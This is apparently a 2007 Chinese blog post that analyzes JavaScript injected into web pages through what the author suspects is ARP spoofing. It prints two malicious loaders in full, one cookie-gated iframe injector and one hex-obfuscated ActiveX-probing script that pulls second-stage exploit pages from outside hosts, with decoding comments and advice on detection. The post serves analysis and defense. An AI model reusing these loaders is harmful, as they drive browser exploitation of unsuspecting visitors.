又被劫持

因为遇到 Firefox 无法下载文件、无法管理下载的问题，重新下载安装了 2.0.0.4 英文版，结果又遭遇劫持事件。

安装以后发现，打开含有 Google AdSense 的页面时，页面里全部多出了一段来自 y66.us 的第三方 JS。

  1. <script src=http://y66.us/2.js></script>

打开这个 JS，是一段通过 document.writeln 往页面里写入隐藏 iframe 的代码：

  // Loader served as http://y66.us/2.js. Every statement is a document.writeln()
  // into the host page, so the browser parses the emitted text as a second
  // <script> element; the real logic is the Start() function that text defines.
  1. document.writeln("<script src=\"http:\/\/y66.us\/oK\/Vernum.js\">< \/script>");   // first pulls another remote script (Vernum.js) from the same host
  2. document.writeln("</script><script>");                                              // closes that tag and opens an inline <script> for Start()
  3. document.writeln("function Start(){");
  // `Then` = now + 24h; used only as the cookie expiry below.
  4. document.writeln("var Then = new Date() ");
  5. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
  // Gate on a cookie named "Cookie1": if it is already present, the if-branch
  // is empty and nothing else happens, so the iframes are injected at most
  // once per 24h per browser (keeps the injection less noticeable).
  6. document.writeln("var cookieString = new String(document.cookie)");
  7. document.writeln("var cookieHeader = \"Cookie1=\" ");
  8. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
  9. document.writeln("if (beginPosition != -1){ ");
  10. document.writeln("} else ");
  // First visit: set the marker cookie, then write a 0x0 iframe pointing at
  // y66.us/oK/oKT.asp. The same iframe is written twice (line 13 starts by
  // closing the first one and opening an identical second one).
  11. document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
  12. document.writeln("document.writeln(\"<iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\">< \\\/iframe>\");");
  13. document.writeln("document.writeln(\"</iframe><iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\">< \\\/iframe>\");");
  14. document.writeln("}");
  15. document.writeln("}");
  16. document.writeln("Start();");   // runs immediately while the host page is still being parsed
  17. document.writeln("< \/script>")

感觉这段代码不会对我的电脑带来任何益处（它只是往页面里写入指向 y66.us 的隐藏 iframe），询问了下，不是 Google AdSense 的问题，那就是我的浏览器出了问题。立即把 Firefox 的所有缓存都清除，并卸载了 Firefox，整机杀了下毒，并没发现什么。重新下载安装中文版的，一切又恢复了正常。😕 不过要注意：这段 JS 是被插入到别人网站的页面里的，如果插入发生在网络链路上（例如局域网内的 ARP 欺骗），清缓存、重装浏览器和本机杀毒都不会去掉它，"恢复正常"也可能只是对方暂时停止了注入——下面 10.18 的更新正好印证了这一点。
比较奇怪，一直比较谨慎，安装了 NoScript，很少会自动运行不正常网站的代码，也不知道是在哪中招了。（如果是链路上的注入，本机并不需要"中招"：页面在到达浏览器之前就已经被改过了，受影响的是整个网段而不是某一台机器。）

暂时可以使用 Anti ARP Sniffer 预防这一问题。更直接的核对方法：用 `arp -a` 查看网关 IP 对应的 MAC 是否与路由器的真实 MAC 一致，并把网关的 ARP 条目绑定为静态；另外换一个网络（或换一台机器）打开同一个页面，看 y66.us 的 script 标签是否还在，可以区分是本机问题还是网段问题。

2007.10.18 Update: 今天又碰到类似的劫持
js来自

  1. <script src=http://rb.vg/1.js></script>

JS 代码为（所有属性名、ActiveX 的 ProgID 和 URL 都用 \x 十六进制转义做了混淆，例如 \x44\x61\x74\x65 就是 Date，目的是躲开对关键字的简单搜索）：

  // Loader served as http://rb.vg/1.js. Every property name, ProgID and URL is
  // written as \x-escaped hex, so a plain search for "cookie", "ActiveXObject"
  // or the hostnames misses it; the decoded value is noted above each line.
  // new Date(), then +24h -> cookie expiry (same once-per-day marker as the y66.us sample).
  1. var vDA1 = new window["\x44\x61\x74\x65"]()
  2. vDA1["\x73\x65\x74\x54\x69\x6d\x65"](vDA1["\x67\x65\x74\x54\x69\x6d\x65"]() + 24*60*60*1000)
  // String(document.cookie)
  3. var eOTo$2 = new window["\x53\x74\x72\x69\x6e\x67"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"])
  // "Cookie1="
  4. var eZT3 = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d"
  // document.cookie.indexOf("Cookie1=")
  5. var VMliYvVKu4 = eOTo$2["\x69\x6e\x64\x65\x78\x4f\x66"](eZT3)
  6. if (VMliYvVKu4 == -1)   // only on the first visit within 24h; otherwise the script is a no-op
  7. {
  // document.cookie = "Cookie1=POPWINDOS;expires=" + vDA1.toGMTString()
  8. window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d\x50\x4f\x50\x57\x49\x4e\x44\x4f\x53\x3b\x65\x78\x70\x69\x72\x65\x73\x3d"+ vDA1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]()
  // Each try{} below probes for one ActiveX ProgID. If the object can be
  // created, a hidden <script>/<iframe> pointing at http://NoP.gs/s368/ is
  // written into the page: the loader fingerprints which IE components are
  // installed and fetches a component-specific second stage. The ".gif"
  // extensions are cosmetic — each URL is loaded as an iframe document, not
  // as an image. Where ActiveXObject is not defined (non-IE browsers) the
  // constructor call throws and catch(e){} swallows it, so only the cookie is
  // set. The trailing tags (ms06014, XL, BF, PPS, CX, LZ, Baidu) are the
  // sample's own labels for each probe and are not verified here.
  // probe "Microsoft.XMLHTTP" -> <script src="http://NoP.gs/s368/NewJs1.js"></script>
  9. try{if(new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\/\/\x4e\x6f\x50\x2e\x67\x73\/\x73\x33\x36\x38\/\x4e\x65\x77\x4a\x73\x31\x2e\x6a\x73\x22\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e');}catch(e){} // ms06014
  // probe "DPClient.Vod" -> <iframe style=display:none src="http://NoP.gs/s368/t368ok.gif"></iframe>
  10. try{if(new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x74\x33\x36\x38\x6f\x6b\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // XL
  // probe "MPS.StormPlayer.1" -> hidden iframe http://NoP.gs/s368/Go368.gif
  11. try{if(new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x47\x6f\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // BF
  // probe "POWERPLAYER.PowerPlayerCtrl.1" -> hidden iframe http://NoP.gs/s368/T368.gif
  12. try{if(new ActiveXObject("\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x54\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // PPS
  // probe "Pdg2" -> hidden iframe http://NoP.gs/s368/reader368.gif
  13. try{if(new ActiveXObject("\x50\x64\x67\x32"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x72\x65\x61\x64\x65\x72\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // CX
  // probe "GLCHAT.GLChatCtrl.1" -> hidden iframe http://NoP.gs/s368/Link368.gif
  14. try{if(new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x4c\x69\x6e\x6b\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // LZ
  // probe "BaiduBar.Tool.1" -> hidden iframe http://NoP.gs/s368/Pic368.gif
  15. try{if(new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x50\x69\x63\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // Baidu
  16. }

疑为局域网 ARP 病毒（ARP 欺骗）：网段内一台被感染的机器冒充网关，在经过它转发的 HTTP 响应里插入 script 标签，因此与访问哪个网站、本机是否中毒都无关。可以用 `arp -a` 核对网关 MAC 是否与路由器真实 MAC 一致来确认；若 MAC 不一致或频繁变化，基本可以断定是这种情况。



  1. 好象不是本地的问题,我的内网服务器有这段js, 访问别的网站都没有。
